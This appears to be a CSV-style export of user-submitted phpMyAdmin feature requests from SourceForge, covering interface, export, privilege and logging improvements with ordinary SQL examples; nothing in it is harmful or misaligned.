MySQL support Store Procedure, Transaction and so on...can be very usefull to add support for adding viewing deleting Stored Procedure.
Actually i was able to add stored procedure with external software...
Original URL https sourceforge.net p phpmyadmin feature requests 1015 https sourceforge.net p phpmyadmin feature requests 1015 Original author leadergl","enhancement"
"24444","5715","copy check Add AUTO INCREMENT value by default.
database gt;operations gt;copy i think Add AUTO INCREMENT value should be checked by default as Structure and data already is).
Otherwise one gets into trouble when trying to insert a new rows into the copied db the least is a Warning 1366) Incorrect integer value... if that value already exists) Original URL https sourceforge.net p phpmyadmin feature requests 1016 https sourceforge.net p phpmyadmin feature requests 1016 Original author windkiel","enhancement"
"24444","5716","Option to disable browser transformations in results.
I find the browser transformation field options to be very useful for displaying dates in an easily readable format when browsing through data.
However, I m now wishing I hadn t set up all of my date fields with this type of transportation because it s making it very difficult to debug a query that compares dates since now my stored dates are transformed while the dates I m embedding are not.
It would make it much easier if there was a way to toggle these transformations on and off while viewing results.
Original URL https sourceforge.net p phpmyadmin feature requests 1017 https sourceforge.net p phpmyadmin feature requests 1017 Original author xangelusx","enhancement"
"24444","5717","Improved web server logging.
In the web server log file you donot see which user is actually using phpMyAdmin.
It would be nice when this info is added to the log file as users are authenticated by the application.
For apache web server I have added the following line in main.php line 80) apache note userID , mysql cur user and host); This helps a bit, but this only helps for a fraction of the logging.
Unfortunately I cannot find a better place to do this suggestion?
), but I think it would improve tracebility a lot when this would become available.
Original URL https sourceforge.net p phpmyadmin feature requests 1018 https sourceforge.net p phpmyadmin feature requests 1018 Original author mcmd1962","enhancement"
"24444","5718","better usability on binary log.
thx for implementing bin log pagination in pma 2.11 .
For the sake of consistency i d rather like to have the same POST submit arrows for next previous page like in sql.php data browse mode and maybe a jump to the last first page took a while to recognize the insignificant link) Original URL https sourceforge.net p phpmyadmin feature requests 1019 https sourceforge.net p phpmyadmin feature requests 1019 Original author windkiel","enhancement"
"24444","5719","coding standard broken still... it was years ago the first time i mention that coding standard is broken in pma, and pma guys fixed it.
mainly the if gt; if etc.
and it was months ago the last time i mention again about the similar problem, suggesting to change if ... gt; if ... .
however, nothing applied till now.
let s see the silly coding style [snip from js functions.js] if navigator.appName == Microsoft Internet Explorer ) \{ ......... \} Do not set click events if not wanted if rows[i].className.search noclick ) != 1) \{ continue; \} [ snip] i don t care which coding standard the pma group pick to use, but shouldn t the coding style be kept constitent in the whole project nowhere?
Original URL https sourceforge.net p phpmyadmin feature requests 1020 https sourceforge.net p phpmyadmin feature requests 1020 Original author xuefer","enhancement"
"24444","5720","support query profiler.
http dev.mysql.com tech resources articles using new query profiler.html add an checkbox to enable profiling per query and display profiling data after query execution compare profiling data of 2 or more queries Original URL https sourceforge.net p phpmyadmin feature requests 1021 https sourceforge.net p phpmyadmin feature requests 1021 Original author cybot tm","enhancement"
"24444","5721","Link documentation from login page.
Hi, A user suggested a useful thing link Documentation.html from the phpMyAdmin login page.
It might make sense to read the documentation before login in, e.g.
because you re having trouble to.
Attached is a quick example of how to solve this.
thanks, Thijs Original URL https sourceforge.net p phpmyadmin feature requests 1022 https sourceforge.net p phpmyadmin feature requests 1022 Original author kink","enhancement"
"24444","5722","Preserve timestamp field with ON UPDATE CURRENT TIMESTAMP.
http sourceforge.net forum forum.php?thread id=1723419 forum id=72909 describes this, but I ll copy that information here ========================= This is for phpmyadmin 2.10.0.2.
I have a timestamp field, set for the NOW ) function, in a database record.
I manually update the records in this database, and the intent of the field is for, most times anyway, the timestamp field to log the last time a record was updated.
However, on some occasions when I update a field, I DON T want the timestamp data in the record to change; I want it to remain whatever it had been.
I d think that if I just used the pulldown menu under FUNCTION to change NOW to the blank entry, the timestamp would remain the same.
But it doesn t. It updates to the current date time.
But if I copy the previous date time, paste it back into the timestamp field after the field has been unwantedly updated, again change FUNCTION from NOW to blank, and save, I am able to reset the timestamp field back to what it was.
This is crazy.
All I want is a way, using phpmyadmin, to, if I choose to, update some fields in a record, but keep the timestamped field holding the last value it had and not updating.
What am I doing wrong?
========================= Below is the structure of the table I am talking about.
It s the Last Update field that I d like to sometimes keep static when updating other fields.
LastName varchar 25) latin1 swedish ci Yes NULL Browse distinct values Change Drop Primary Unique Index Fulltext FirstName varchar 25) latin1 swedish ci Yes NULL Browse distinct values Change Drop Primary Unique Index Fulltext preferred varchar 25) latin1 swedish ci No Browse distinct values Change Drop Primary Unique Index Fulltext egreet varchar 25) latin1 swedish ci No Browse distinct values Change Drop Primary Unique Index Fulltext don t mail to char 1) latin1 swedish ci Yes x Browse distinct values Change Drop Primary Unique Index Fulltext UsedCheck char 1) latin1 swedish ci No Browse distinct values Change Drop Primary Unique Index Fulltext Street varchar 40) latin1 swedish ci No Browse distinct values Change Drop Primary Unique Index Fulltext City varchar 25) latin1 swedish ci No Browse distinct values Change Drop Primary Unique Index Fulltext State char 2) latin1 swedish ci No Browse distinct values Change Drop Primary Unique Index Fulltext Zip varchar 5) latin1 swedish ci No Browse distinct values Change Drop Primary Unique Index Fulltext Last Update timestamp ON UPDATE CURRENT TIMESTAMP No CURRENT TIMESTAMP Browse distinct values Change Drop Primary Unique Index Fulltext 2007 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 2006 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 2005 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 2004 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 2003 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 2002 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 2001 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 2000 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext 1999 int 6) Yes 0 Browse distinct values Change Drop Primary Unique Index Fulltext Source varchar 15) latin1 swedish ci No OACS Browse distinct values Change Drop Primary Unique Index Fulltext SourcePerson varchar 12) latin1 swedish ci No Dave Browse distinct values Change Drop Primary Unique Index Fulltext email varchar 50) latin1 swedish ci No Original URL https sourceforge.net p phpmyadmin feature requests 1023 https sourceforge.net p phpmyadmin feature requests 1023 Original author semphatis","enhancement"
"24444","5723","custom e mail notifications upon row update.
It d be great to be able send automatic email notification upon insertion or update of a row in phpMyAdmin.
You should be able to give it a set of rules that defines when to send emails and to whom.
Original URL https sourceforge.net p phpmyadmin feature requests 1024 https sourceforge.net p phpmyadmin feature requests 1024 Original author sairez","enhancement"
"24444","5724","Select columns and lines for edition.
In the viewing of lines of the table, be able to have a checkbox for each column, so that the user can select only the columns that he want to edit, see the down the image for understand better.
Where gray checkbox is a key column displayed ALWAYS on edition); Where off checkbox is a column not selected for edition; Where on checkbox is a column selected for edition.
Bye, David.
Original URL https sourceforge.net p phpmyadmin feature requests 1025 https sourceforge.net p phpmyadmin feature requests 1025 Original author david71rj","enhancement"
"24444","5725","Button Remove table.
Im not sure if thats with all layouts and stuff but I just noticed that it is not a good design to have the button for Show and Remove right above each other ... You all know how it is .. you want to click show .. but u click remove coz you didnt aim too well ...
Yes I know there is a security question before removing the table ... but I would rate it 30 50 that people dont actually read every Question Popup .. or they are a bit distracted and click on it before understand that it really meant.
maybe the remove Table Option should be under Operations by default !?
Original URL https sourceforge.net p phpmyadmin feature requests 1026 https sourceforge.net p phpmyadmin feature requests 1026 Original author thebelgarion","enhancement"
"24444","5726","Tighter control over user interface.
Under SQL tab, the caption is Run SQL query queries on server lt;actual server name gt; , this should be replaced with the verbose server name, if set.
I d like to be able to disable the Databases link on the home page.
I d like to be able to disable the Processes link on the home page.
I d like to be able to disable the Storage engines link on the home page.
I d like to be able to disable the Export and Import links on the home page.
I d like to be able to disable the Show MySQL runtime information and Show MySQL system variables links on the home page.
I d like to be able to disable the ChangeLong , Subversion , and Lists links on the home page.
I d like to be able to disable the phpMyAdmin documentation on the home page.
I d like to be able to configure, on a per server basis and globally, the initial font size setting percent).
I d like to be able to hide the MySQL client version , Server version , and Used PHP extensions information displayed on the home page.
I d like to be able to hide ANY version information about phpMyAdmin.
I d like to be able to disable the Enable statistics function under Databases .
Also, under the Databases tab, the text Create new database is displayed, even if I ve told the configuration not to allow this.
The message is immediately followed by No privileges .
All in all, I want to keep phpMyAdmin s information disclosure down to a bare minimum to allow customers to use it to administrate their own databases.
I ve pointed some of these out in the past, and some things have been improved.
But the above issues are still issues.
Original URL https sourceforge.net p phpmyadmin feature requests 1027 https sourceforge.net p phpmyadmin feature requests 1027 Original author joho68","enhancement"
"24444","5727","Insert Edit Go button location.
Hi, On pages where you can insert update multiple rows, starts buttons are shown after every 15 HTML table rows or so, right in the middle of a real row.
Could you only show them at the end of a row?
Original URL https sourceforge.net p phpmyadmin feature requests 1028 https sourceforge.net p phpmyadmin feature requests 1028 Original author olafvdspek","enhancement"
"24444","5728","Templates for often used SQL Queries.
Hello on the SQL Option phpMyAdmin tbl properties.php) it would be nice to have templates of often used queries and not only the SELECT Query.
Buttons or Combo Box) with this SQL Queries a) SELECT FROM `table` WHERE `column`= example ; b) UPDATE `table` SET `column`= example WHERE `column`= xyz ; c) DELETE FROM `table` WHERE `column`= example LIMIT 1; d) ...
Original URL https sourceforge.net p phpmyadmin feature requests 1029 https sourceforge.net p phpmyadmin feature requests 1029 Original author misterx1980","enhancement"
"24444","5729","forcing .js refresh after changes.
After updating to new phpMyAdmin versions the browser may use the old .js files, see user reports error in left.php and somesuch.
Same problem when testing phpmyadmin trunk .
Suggestion all .js files should be called like example.js?10399 example.js?
.
example revisionnumber) to force the browser to reload the updated version.
Original URL https sourceforge.net p phpmyadmin feature requests 1030 https sourceforge.net p phpmyadmin feature requests 1030 Original author windkiel","enhancement"
"24444","5730","Edit only selected fields.
http sourceforge.net forum forum.php?thread id=1739401 forum id=72909 Basically, if I run an SQL query such as Select field1 from table; I get a nice list of one field results.
however when I now do Check All and then Edit , it gives me all fields to edit.
really, it should know that i only ran a query with one field, so i should only edit one field.
many thanks Original URL https sourceforge.net p phpmyadmin feature requests 1031 https sourceforge.net p phpmyadmin feature requests 1031 Original author wilkesalex","enhancement"
"24444","5731","On the fly query collation setting in sorted browse mode.
Hi, I m working with database containing many different languages, so my collation is set to utf8 general ci .
But when I browse the tables in phpMyAdmin, I d like to be able to set sorting collation when sorting by text fields.
Example Query SELECT id, text, language FROM table WHERE language = cs cz ; Then sort the string by text column.
phpMyAdmin changes the query to SELECT id, text, language FROM table WHERE language = cs cz ORDER BY text ASC; I d like to by able to select collation for this sort without manually changing the query to SELECT id, text, language FROM table WHERE language = cs cz ORDER BY text COLLATE utf8 czech ci ASC; Original URL https sourceforge.net p phpmyadmin feature requests 1032 https sourceforge.net p phpmyadmin feature requests 1032 Original author zarevak","enhancement"
"24444","5732","Improve Grouping of tables left nav pane).
See the screenshot attached.
The grouping code currently groups with the seperator which is configurable).
However as you can see in the screenshot, this way grouping will only catch tables that have the in their names.
For example consider this heirchy of tables users users permissions users language users timezone etc...
It would be very helpfull to have all 4 of the above tables grouped under the first table users .
Currently this is what happens users [ ] users 3) Does anyone else agree with me? )
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 1033 https sourceforge.net p phpmyadmin feature requests 1033 Original author amanpatel","enhancement"
"24444","5733","Add troubleshooting page for linked tables features.
I ve installed phpMyAdmin on many systems, but I m always running into problems with the linked tables infrastructure.
I waste lots of time going round and round, reading the docs, tweaking configs, creating users, assigning permissions, but it seems to be entirely random whether the linked tables features work, even though everything seems to be as it should.
What would be really helpful is a diagnostics page where the linked tables features could be completely tested and faults diagnosed.
Original URL https sourceforge.net p phpmyadmin feature requests 1034 https sourceforge.net p phpmyadmin feature requests 1034 Original author coolbru","enhancement"
"24444","5734","missing trigger in export.
as the subject said triggers for the export are strongly recommend!
kind regards flobee Original URL https sourceforge.net p phpmyadmin feature requests 1035 https sourceforge.net p phpmyadmin feature requests 1035 Original author flobee","enhancement"
"24444","5735","Status page to contain comparable values.
File server status.php is invoked from pressing Status for your server.
This is a great tool for pin pointing potential problems with your applications but I find myself missing a simple feature on the page.
Every once in a while I go there to see if some numbers are too high meaning I may have code leaking SQL wise.
It is easily spotted by looking at Handler read rnd and Handler read rnd next for example.
What I keep finding myself doing is calculating how many minutes of uptime I have, and divide the above mentioned numbers with this amount of minutes... only to get a comparable number.
Sometimes I read values after 24 hours sometimes after 14 days.
Having a number per minute would make a lot of sense here.
Not only for the 2 I mentioned but for a lot of values on the status page.
I haven t looked at the PHP code, but I m pretty sure this is an easy task as all numbers already exist it s just a matter of a few arithmetic operations ) Original URL https sourceforge.net p phpmyadmin feature requests 1036 https sourceforge.net p phpmyadmin feature requests 1036 Original author avizion","enhancement"
"24444","5736","UUID primary key.
Add UUID in the list of Functions and enable it by default for the primary key, provided this is a character field.
When building an application with multiple users, the UUID makes it near impossible for users to see others info if you use the querystring).
I am just saying that it would be nice to add the UUID as the default on insert into the tables like CURRENT TIMESTAMP.
Right now you cant do that without editing the SQL by hand.
Original URL https sourceforge.net p phpmyadmin feature requests 1037 https sourceforge.net p phpmyadmin feature requests 1037 Original author velkymx","enhancement"
"24444","5737","Full, flexible source DB target DB Structure Type Data Sync.
I d like phpmyadmin to have the ability for me to select two different DBS on 2 different connections and have phpmyadmin scan both and diplay a split source db and target db view of both with tables, fieldnames and types listed and the differences.
highlighted.
In that view I d like a widget with a list of auto generated or ordered structure sync, type sync and data sync queries which I can select deselect in a column of checkboxes and then execute the selected ones via a button in order to sync the DB parts I d like to sync.
...
I find this the most usefull feature of the closed source tool Navicat over phpmyadmin.
However, their Linux version is a disgrace and I d appreciate this feature as an attractive addition to phpmyadmin.
Sidenote I m a professional PHP Developer and have no time to join phpmyadmin but I m willing to support any core developer who want s to implement this feature as a personal assistant code monkey.
I can help plan the feature in detail or help code functions for DB analysis or testing of implementations of comparsion algorithyms or such.
Contact me at flashdev \{put the a with the squiggle around it here\} projekte \{full stop\} richdale \{full stop\} de.
Original URL https sourceforge.net p phpmyadmin feature requests 1038 https sourceforge.net p phpmyadmin feature requests 1038 Original author phillip","enhancement"
"24444","5738","automatic export.
to automatically dl db s to my pc for off site backups Original URL https sourceforge.net p phpmyadmin feature requests 1039 https sourceforge.net p phpmyadmin feature requests 1039 Original author dkaleky","enhancement"
"24444","5739","Move max characters = 1000; to config.
windkiel was kind enough to help me find this param that shortened long SQL [...] Can we move this into a param in the config?
It would be useful for thouse of us that dont have any large raw fields but create large SQL statements.
Cheers.
Si.
Original URL https sourceforge.net p phpmyadmin feature requests 1040 https sourceforge.net p phpmyadmin feature requests 1040 Original author r si","enhancement"
"24444","5740","Add way to specify client SSL certificates.
phpMyadmin v 2.10.2 php v 5.2.3 MySQL v 5.0.41 compiled with openssl support openssl v 0.9.8e Problem MySQL user with REQUIRE X509 could not be logged in by phpmyadmin, despite of cfg[ Servers ][ i][ ssl ]=true in config.inc.php Ad Hoc solution in file libraries dbi mysqli.dbi.lib.php, preceding l.102 return value = mysqli real connect ...); I added the following line mysqli ssl set link, server key.pem , server cert.pem , cacert.pem , NULL, NULL); In case I reported a known bug sorry for that!
Greetings, Heinz Original URL https sourceforge.net p phpmyadmin feature requests 1041 https sourceforge.net p phpmyadmin feature requests 1041 Original author heinz2","enhancement"
"24444","5741","Reload Privileges on home page.
Hi, Why is reload privileges on the home page?
It s more a command for on the privileges page I think.
If you do decide to keep it, could you move it below the privileges link itself?
Original URL https sourceforge.net p phpmyadmin feature requests 1042 https sourceforge.net p phpmyadmin feature requests 1042 Original author olafvdspek","enhancement"
"24444","5742","Frames free interface.
My server isn t the fastest in the world and I m using phpmyadmin 1 3 of my time when I work.
And frames is slow, so when I use phpmyadmin so much, it get annoying that it is so slow.
I hope that the will be a version without frames soon.
Alexander Frxc3xb8yseth Original URL https sourceforge.net p phpmyadmin feature requests 1043 https sourceforge.net p phpmyadmin feature requests 1043 Original author alectbm","enhancement"
"24444","5743","Server Synchronization.
Hi to all open source supporters ) Normally, for development I m working on my local machine which is a mysql server, and then upload my work to actual web server when I m finished with it, like everybody does.
As a result, it s unavoidable to have some synchronization issues as a part of development deployment circle.
It was nice to have that phpMyAdmin could handle that.
A new tab for synchronization might be added, which asks for mysql server address and user info, than connects to the remote server and does the SQL stuff... With current version, this can be done by 1\.
Creating an SQL dump of up2date database 2\.
Uploading and executing it on the another server s phpMyAdmin A one click synchronization would be really nice ) Then maybe we could save this remote servers login data in a new local database named phpMyAdmin) and then select one of pre saved remote servers from a list, and click sync .
Original URL https sourceforge.net p phpmyadmin feature requests 1044 https sourceforge.net p phpmyadmin feature requests 1044 Original author metalyric","enhancement"
"24444","5744","Databases in folders groups.
i have a lot of databases and that gets messy what i would hope for is the development team making a table in the default pma database called pma db groups which would allow you to map simlar databases into a folder group for example multiple joomla databases chould all be put under one group called websites also sub groups or folders in this sort would be nice and alow for a database to be in multiple folders with a table stucture simlar to the following CREATE TABLE `pma groups` `id` INT 11 ) UNSIGNED NOT NULL AUTO INCREMENT PRIMARY KEY , `title` VARCHAR 128 ) NOT NULL , `db` VARCHAR 255 ) NOT NULL , `parent id` INT 11 ) UNSIGNED NOT NULL ) ENGINE = MYISAM ; Thanks for considering this Original URL https sourceforge.net p phpmyadmin feature requests 1045 https sourceforge.net p phpmyadmin feature requests 1045 Original author koejatman","enhancement"
"24444","5745","Add the Geometry DataTypes.
add all the geomoty datatypes and anything that goes with that if there are special functions for handling geometric data in mysql databases Original URL https sourceforge.net p phpmyadmin feature requests 1046 https sourceforge.net p phpmyadmin feature requests 1046 Original author koejatman","enhancement"
"24444","5746","Export datadictionary as png.
It would be helpful if the schema could easily be dumped to a png or some other format like pdf, etc) to show the data dictionary and the relationships between table members.
For other projects that use phpMyAdmin as the development interface for there schema this would help in documenting and keep documentation up to date on the schema and relationships between those tables.
Original URL https sourceforge.net p phpmyadmin feature requests 1047 https sourceforge.net p phpmyadmin feature requests 1047 Original author dgtlrift","enhancement"
"24444","5747","sql documented changes of structure.
Hi there, it would be a very nice feature to make it possible to document changes in your structure.
While developing applications you often need to change your tables structures.
For a simpler deployment of new versions it would come in very handy to pull structure changes since 2010 11 12 out of PMA and work into your update scripts.
Original URL https sourceforge.net p phpmyadmin feature requests 1048 https sourceforge.net p phpmyadmin feature requests 1048 Original author rodneyrehm","enhancement"
"24444","5748","Pls.
add a breadcrumb when creating managing privileges.
Hi PMA, Is it possible for you to add a breadcrumb when managing privileges.
Here s my scenario, i set a privilege for a user, then set the database, then set the tables.
after that if i want to add another one i have to click on localhost then privilege.
is there a way to make a history breadcrumb of my actions like privilege gt; create user gt; add db privilege gt; add table privilege so that i can just click on those links like create user rather that going over the whole process again.
Thanks, Mon Original URL https sourceforge.net p phpmyadmin feature requests 1049 https sourceforge.net p phpmyadmin feature requests 1049 Original author monloi","enhancement"
"24444","5749","Table List Paging.
Hi, The table list is divided in pages of 100 rows each.
But there s no way to go to another page in the left frame.
Also, I think this shouldn t be enabled by default or the limit should be much higher 250 or 1000).
100 rows is less than 2 screens here.
Original URL https sourceforge.net p phpmyadmin feature requests 1050 https sourceforge.net p phpmyadmin feature requests 1050 Original author olafvdspek","enhancement"
"24444","5750","IP address field stored as INT.
I have many fields wich stores IP address as INT as a result of ip2long ) function.
Please add a transformation option to view this fields as a normal IPv4 address.
Original URL https sourceforge.net p phpmyadmin feature requests 1051 https sourceforge.net p phpmyadmin feature requests 1051 Original author hexone","enhancement"
"24444","5751","Button to show ALL records in table.
A simple and quick feature Add a button on the page listing table records which will show ALL records in the table on one page.
If the table has many records, a quick Javascript confirmation box could be implemented.
Then I wouldn t have to put in the starting and ending numbers manually, which requires a lot of shifting between mouse and keyboard.
This I something I have a need for very often and I believe others would too.
Original URL https sourceforge.net p phpmyadmin feature requests 1052 https sourceforge.net p phpmyadmin feature requests 1052 Original author ajensendk","enhancement"
"24444","5752","Quick search on primary key field.
A form field on both the Structure and Browse page to quickly search on the primary key if there is one.
This is something I believe everybody does VERY often, I do it all the time!
And it would be fairly simple to do I believe if your code is well structured ) ) Original URL https sourceforge.net p phpmyadmin feature requests 1053 https sourceforge.net p phpmyadmin feature requests 1053 Original author ajensendk","enhancement"
"24444","5753","Faster way to move tables.
Hello, It currently looks like phpMyAdmin uses a Create table statement, and then inserts data using a sub select on the table.
Method found in Operations tab of a table) A much faster way would be to use RENAME TABLE provided by MySQL.
It is Exponentially faster in comparison to the old method A 2.1 GB table 2,500,000 rows) phpMyAdmin way Took upwards of 28 minutes to do MySQL s Rename Table way Your SQL query has been executed successfully Query took 0.0103 sec) Ryan Original URL https sourceforge.net p phpmyadmin feature requests 1054 https sourceforge.net p phpmyadmin feature requests 1054 Original author rygorde4","enhancement"
"24444","5754","Allow server port to be entered with arbitary host.
According to documentation ========== cfg[ AllowArbitraryServer ] If enabled allows you to log in to arbitrary servers using cookie auth.
========== The login page allows the user to type an arbitrary server host as documented), but does not allow the user to specify the mysql server port, neither understands the host port format.
Please extend the functionality to either support host port notation in the Server field in the Log In page or add a dedicated text field for the port number.
========== Background I am connecting to MySQL severs via ssh tunnels, which tunnels maps several ports to several remote MySQL servers.
For different reasons it is not usable for me to configure all the used tunnels in the config.inc.php file.
Thus I need to be able to specify the [mapped by the tunnel] port number together with the host in the Log In page.
Original URL https sourceforge.net p phpmyadmin feature requests 1055 https sourceforge.net p phpmyadmin feature requests 1055 Original author gtalev","enhancement"
"24444","5755","For editing long tables, allow SELECT.
If in a long table a few fields per record are to be edited manually, much scrolling is needed to find the field s) in all those record, and too easily records may be overlooked.
This could be made much easier if a kind of SELECT were allowed to reduce the number of fields displayed in the edit screen.
This way, we might SELECT only those fields that are to be editied as well as a few more fields needed to check which records must edited and which not.
Original URL https sourceforge.net p phpmyadmin feature requests 1056 https sourceforge.net p phpmyadmin feature requests 1056 Original author h hahn","enhancement"
"24444","5756","Hide InnoDB count warnings.
Hi there, Could the ability be added to hide the display of the May be approximate.
See FAQ 3.11 warning that is displayed about the record count when using InnoDB tables?
Although this is useful initially, there are circumstances where the experienced user will be aware of this limitation and will want to disable the display of the warning.
The warning is displayed when browsing a table s contents and also when viewing the database s structure.
As well as displaying the actual warning text, the option should also disable the lightbulb hint and the prepending of a tilde ) to the record count of the tables.
From what I can see, this would require the creation of an appropriate flag in the configuration files and then a few simple modifications to db structure.php and libraries display tbl.lib.php to test for this flag before displaying the warning and adding the tilde hint icon.
Original URL https sourceforge.net p phpmyadmin feature requests 1057 https sourceforge.net p phpmyadmin feature requests 1057 Original author chp flms","enhancement"
"24444","5757","Include offset information in paginated navigation.
This is specifically about the database list in the navigation, introduced in version 2.11.0.
On a server with a very large number of database 2000 ) where the database names are not very normalized 1000 might all begin with the letter c ), it requires a lot of clicking to locate a specific database.
The same might also apply to a database with a very large number of tables.
I would like to propose a couple of options to help this 1) In the Page Number select, include the first record on each page.
Example Page Number 1 2 3 4 might become Page Number 1 database alpha...) 2 database golf...) 3 database november...) 4 dtabase tango...) Then it becomes possible to identify which page a particular database is on without guessing.
An additional or alternate) option might be to add a text box on the main page to open a specific database by name [Binary Log] [Databases] by name [ textinput ] [ Submit ] [Export] [Import] Original URL https sourceforge.net p phpmyadmin feature requests 1058 https sourceforge.net p phpmyadmin feature requests 1058 Original author hopson","enhancement"
"24444","5758","Quick links to frequently used queries.
It will be useful to have a panel displaying quick links to certain stored queries for later use, much like views in ms access.
especially useful for various statistical SELECT queries which the user may check from time to time.
Original URL https sourceforge.net p phpmyadmin feature requests 1059 https sourceforge.net p phpmyadmin feature requests 1059 Original author virusia","enhancement"
"24444","5759","designer settings should be part of the saved state.
Designer should remember snap to grid and angular links settings.
Original URL https sourceforge.net p phpmyadmin feature requests 1060 https sourceforge.net p phpmyadmin feature requests 1060 Original author ethx","enhancement"
"24444","5760","login attempt e mail notification.
Hello, Would like to put in a request for a feature that sends e mail notification when there is a login attempt or when someone successfully logs in.
Otherwise it s pretty hard to detect if someone has found the phpmyadmin installation and is trying to brute force the logins.
IP based directory protection is also not an option for users with a dynamic IP address.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1061 https sourceforge.net p phpmyadmin feature requests 1061 Original author merc444","enhancement"
"24444","5761","export into php file.
It would be nice to export the complete database to a php file like lt;?php connection information ip = ; user = ; pass = ; db name = ; MYSQL CONNECT ip, user, pass); MYSQL SELECT DB db name); mysql query CREATE ........ ); mysql query INSERT ........ ); ?
gt; So that I only have to insert the connection information.
Than I can copy the hole file to the new webserver and execute it like.
http www.newserver.de tabelimport.php Thanks very much.
NICE PROGRAM!!!!!!!!!!!!!!!!!!
Original URL https sourceforge.net p phpmyadmin feature requests 1062 https sourceforge.net p phpmyadmin feature requests 1062 Original author thereality","enhancement"
"24444","5762","Non paginated database selectbox.
I have a fast connection between the web server and all of our database servers.
Shuffling data between the servers take little or no time.
I don t know at which point this feature was introduced into phpma, but the pagination of the database list is something I d like to get rid of.
I found the two configuration options cfg[ DisplayDatabasesList ] = false; cfg[ MaxDbList ] = 100; but I still get pagination perhaps in navigation.php?
), which I think should be optional.
Original URL https sourceforge.net p phpmyadmin feature requests 1063 https sourceforge.net p phpmyadmin feature requests 1063 Original author joho68","enhancement"
"24444","5763","Multi character LeftFrameDBSeparator.
Allow setting of more than one character for the config parameter LeftFrameDBSeparator.
I have several systesm supported and they use different database separators dash and underscore), it woudl be nice to set both of these in LeftFrameDBSeparator so that all databases are grouped in the left hand area.
Change would be around line 322 in List Database.class.php version 3.11.2) as far as I can tell.
Original URL https sourceforge.net p phpmyadmin feature requests 1064 https sourceforge.net p phpmyadmin feature requests 1064 Original author bugrain","enhancement"
"24444","5764","Metalink download support.
Hello, Because there are no BitTorrent downloads yet, http sourceforge.net tracker index.php?func=detail aid=1351277 group id=23067 atid=377411, I would recommend to add Metalink downloads as they are supported by many clients now and there are very easy scripts to generate Metalinks It would be easier and faster to download new phpMyAdmin releases with .metalink files.
See http www.metalinker.org ubuntu for an example of what is already possible.
I attached a full example for the current phpMyAdmin 2.11.2 release, please try them in a download client of your choice for example the current DownThemAll beta for Firefox).
The Metalinks include MD5 SHA1 SHA256 ED2K checksums and piece hashes for faster error recognition and correction and all SourceForge mirrors including their country codes so one or even multiple nearer mirrors will be automatically selected for faster downloading.
In addition, ED2K and Magnet links are included for cross network P2P downloads and the attachment contains a XSL file to present a customizable and usable download page for clients without Metalink capability.
Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin feature requests 1065 https sourceforge.net p phpmyadmin feature requests 1065 Original author rele","enhancement"
"24444","5765","show BINARY as HEX or [xxx byte] instead of TEXT.
Hi, I ve got a binary 20) field and it s shown as unreadable) text instead of as hex.
Note that this is not a char 20) field with the binary bit set, but a binary field.
Original URL https sourceforge.net p phpmyadmin feature requests 1066 https sourceforge.net p phpmyadmin feature requests 1066 Original author olafvdspek","enhancement"
"24444","5766","Something to export in batch mode.
It is difficult to export from an internet provider in a batch mode.
The currently export script is only designed for an interactive use, but for an automatic backup with parameter it is very difficult.
Actually, it work for me but with form post data with wget, and parameters are difficult to find.
Is it possible to think to a script for this use, so a cron job could run the script with all parameters for backup.
By example, parameters in a file in an interactive first backup, and next backups could be realised with the same parameter file.
Ideally, if it could login at the same place.
Thanks for all Original URL https sourceforge.net p phpmyadmin feature requests 1067 https sourceforge.net p phpmyadmin feature requests 1067 Original author philippe85","enhancement"
"24444","5767","Option for disabling version string on login page.
Hello, due to rising amount of security patches which I strongly support and be thankful for) I looked for a possibility to hide the version string of my current installation till I have got the time to upgrade.
This way bots searching for vulnarable site would have it a lot harder to get the version string.
I didn t find a way to do it just for the login site I use cookie auth) without editing the core files main.php or index.php, I guess).
That s why I helped myself with editing the config.inc.php with the line DEFINE PMA VERSION , ); which rewrites the version string applicationwide.
Since I rather want to disable the string just on the login page authenticated users should be able to see the version) I hereby file a feature request.
Thank you, Stefan Original URL https sourceforge.net p phpmyadmin feature requests 1068 https sourceforge.net p phpmyadmin feature requests 1068 Original author stefan hoth","enhancement"
"24444","5768","Column Name Field HTML) please enlarge.
Hi, The column name field when editing a column) is only 13 chars long.
Could you enlarge this?
I think 30 would be a good length.
Original URL https sourceforge.net p phpmyadmin feature requests 1069 https sourceforge.net p phpmyadmin feature requests 1069 Original author olafvdspek","enhancement"
"24444","5769","db structure.php column for table creation and update date.
Hello it would be nice if on the db structure.php a column for table creation date and update date is shown and that the colums are sortable.
So that we do not need to click on every table an look there the creation update date time).
Thx Dirk from germany Original URL https sourceforge.net p phpmyadmin feature requests 1070 https sourceforge.net p phpmyadmin feature requests 1070 Original author misterx1980","enhancement"
"24444","5770","Allow non display of tables mysql, information schema).
Allow superusers to possibly check a box?
and choose not to display tables that they do not wish to see.
for me its the mysql and information schema tables, i never plan to edit these in phpMyAdmin, if i choose to add a user it will be through the command line interface, I am sure there are other users who feel the same way Original URL https sourceforge.net p phpmyadmin feature requests 1071 https sourceforge.net p phpmyadmin feature requests 1071 Original author ikender","enhancement"
"24444","5771","Fewer icons, more compact data.
I like version 2.5.6 because the interface is SIMPLE.
2.11.3 has icons exploding all over the place and they all look like they have been created by different designers.. even the themes... please, make this stuff simple again or give us a way to access the small, 2D icons that did not get in the way of the data.
Also, layout design... the table descriptions gets mixed up with the tabular data.. all of the furniture should recede away from the data grids, not clamor for attention.
Anyway, went looking for simple themes and can t find.. would be nice to be able to turn off the noise and let the data stand out.
Thank you for considering a simple, clean, boring interface...
Original URL https sourceforge.net p phpmyadmin feature requests 1072 https sourceforge.net p phpmyadmin feature requests 1072 Original author gmclean","enhancement"
"24444","5772","Copy set of tables to new name pattern.
Right now I can copy each table individually to a new name, but it requires me to go to every table in the database to do this operation.
It would be much easier if there was a way to batch copy tables to a new table prefix.
